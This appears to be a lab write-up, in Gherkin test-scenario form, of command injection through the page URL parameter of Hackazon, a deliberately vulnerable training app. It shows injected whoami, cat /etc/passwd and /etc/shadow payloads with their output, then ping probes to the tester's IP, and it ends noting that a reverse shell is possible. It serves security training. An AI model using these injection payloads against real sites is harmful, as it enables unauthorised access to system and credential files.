# language: en

Feature: Command Injection - URL
  From the Hackazon system
  Of the category A1: Injection
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /account/documents
    Message: Documents
    Details:
      - A list with two documents (Terms and Delivery)
    Objective: Retrieve sensitive data through Command Injection
    """

  Scenario: Test the scope of the vulnerability
    When I prepend the two most common symbols (';' and '|') to the command
    """
    Input:  ?page=;%20whoami or ?page=|%20whoami
    Output: www-data
    """
    Then both show me the same results thus the input is not being sanitized
    Given I want to test the scope of the actions that this user can perform
    When I try to read the content of the files '/etc/passwd' and '/etc/shadow'
    """
    Input:  ?page=;%20cat%20/etc/passwd
    Output: root:x:0:0:root:/root:/bin/bash
            daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
            bin:x:2:2:bin:/bin:/usr/sbin/nologin
            sys:x:3:3:sys:/dev:/usr/sbin/nologin
            sync:x:4:65534:sync:/bin:/bin/sync
            games:x:5:60:games:/usr/games:/usr/sbin/nologin
            man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
            lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
            mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
            news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
            uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
            proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
            www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
            ...

    Input:  ?page=;%20cat%20/etc/shadow
    Output: # Blank page
    """
    Then I can assume that the user 'www-data' doesn't have access to the file
    Given it can be possible that the server have connectivity to my computer
    When I ping my IP passing the command through the URL of the web page
    """
    Input:  ?page=;%20ping%20192.168.0.15
    Output: # It keeps loading
    """
    Then it gets stuck since the command never finish so I do it again
    But this time I add the switch '-c 5' to stop after 5 ECHO_REQUEST
    """
    Input:  ?page=;%20ping%20-c%205%20192.168.0.15
    Output: PING 192.168.0.15 (192.168.0.15) 56(84) bytes of data.
            64 bytes from 192.168.0.15: icmp_seq=1 ttl=61 time=0.492 ms
            64 bytes from 192.168.0.15: icmp_seq=2 ttl=61 time=0.599 ms
            64 bytes from 192.168.0.15: icmp_seq=3 ttl=61 time=0.409 ms
            64 bytes from 192.168.0.15: icmp_seq=4 ttl=61 time=0.530 ms
            64 bytes from 192.168.0.15: icmp_seq=5 ttl=61 time=0.585 ms
            --- 192.168.0.15 ping statistics ---
            5 packets transmitted, 5 received, 0% packet loss, time 3999ms
    """
    Given it seems that I have connectivity, a reverse shell attack is possible
